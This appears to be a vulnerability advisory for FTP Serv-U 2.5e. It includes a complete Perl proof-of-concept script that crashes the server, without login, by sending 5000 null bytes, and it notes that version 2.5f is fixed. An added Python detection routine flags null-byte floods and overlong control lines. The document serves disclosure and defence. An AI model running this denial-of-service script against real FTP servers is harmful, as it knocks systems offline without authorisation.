COMMAND

    servu

SYSTEMS AFFECTED

    FTP Serv-U 2.5e

PROBLEM

    Blue Panda found the following.  Sending FTP Serv-U a string
    containing a large number of null bytes will cause it to stack
    fault.  The system Serv-U is running on may become
    sluggish/unstable and eventually bluescreen.  A valid user/pass
    combination is not required to take advantage of this
    vulnerability.

    Proof of concept:

    #!/usr/bin/perl
    #
    # FTP Serv-U 2.5e denial-of-service
    # Blue Panda - bluepanda@dwarf.box.sk
    # http://bluepanda.box.sk/
    #
    # ----------------------------------------------------------
    # Disclaimer: this file is intended as proof of concept, and
    # is not intended to be used for illegal purposes. I accept
    # no responsibility for damage incurred by the use of it.
    # ----------------------------------------------------------
    #
    # Crashes FTP Serv-U 2.5e by sending it a string of null bytes.
    #

    use IO::Socket;

    $host = "ftp.host.com";
    $port = "21";

    print "Connecting to $host:$port...";
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host,
    PeerPort=>$port) || die "failed.\n";
    print "done.\n";

    $counter = 0;
    $buf = "";
    while ($counter < 5000) {
            $buf .= "\x00";
            $counter += 1;
    }
    print $socket "$buf\n";

    sleep(4);
    close($socket);

SOLUTION

    A fix has been released.  FTP Serv-U 2.5f is immune.  The same seems
    to apply to Serv-U 2.5d.  This exploit doesn't work on Serv-U 2.5e
    (2.5.5.2) on Windows 2000 Professional with SP1.
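
    A detection check for the traffic pattern described above, as an
    added example (not part of the original advisory and not Serv-U
    code): it scans a client-to-server FTP control stream for command
    lines that carry a run of null bytes or exceed a length cap, and
    records whether they arrived before any PASS command.  The function
    name, thresholds and sample streams are assumptions constructed for
    illustration.

```python
import re

# Assumed thresholds for this example; tune them for the traffic you see.
MAX_LINE = 512   # cap on one control-channel command line, in bytes
MAX_NULS = 8     # tolerates an occasional CR NUL pair from Telnet NVT encoding

def inspect_control_stream(data: bytes):
    """Return findings for one client-to-server FTP control stream."""
    findings = []
    seen_pass = False  # client-side view only: PASS sent, not login accepted
    # Split on LF alone, since a sender need not terminate lines with CRLF.
    for lineno, line in enumerate(data.split(b"\n"), start=1):
        line = line.rstrip(b"\r")
        if not line:
            continue
        nuls = line.count(b"\x00")
        reasons = []
        if nuls >= MAX_NULS:
            reasons.append(f"{nuls} NUL bytes")
        if len(line) > MAX_LINE:
            reasons.append(f"length {len(line)} > {MAX_LINE}")
        if reasons:
            findings.append({"line": lineno, "pre_auth": not seen_pass,
                             "reasons": reasons})
        elif re.match(rb"(?i)PASS(\s|$)", line):
            seen_pass = True
    return findings

# Constructed sample streams (not captured traffic).
SAMPLES = {
    "normal_login": b"USER alice\r\nPASS example\r\nLIST\r\nQUIT\r\n",
    "nul_flood_pre_auth": b"\x00" * 5000 + b"\n",
    "nul_flood_post_auth": b"USER alice\r\nPASS example\r\n" + b"\x00" * 600 + b"\r\n",
    "cr_nul_in_path": b"USER alice\r\nPASS example\r\nRETR a\r\x00b\r\n",
}

if __name__ == "__main__":
    for name, stream in SAMPLES.items():
        print(name, inspect_control_stream(stream))
```

    The same two conditions can serve as a drop rule in a proxy placed
    in front of a server that cannot yet be upgraded to 2.5f.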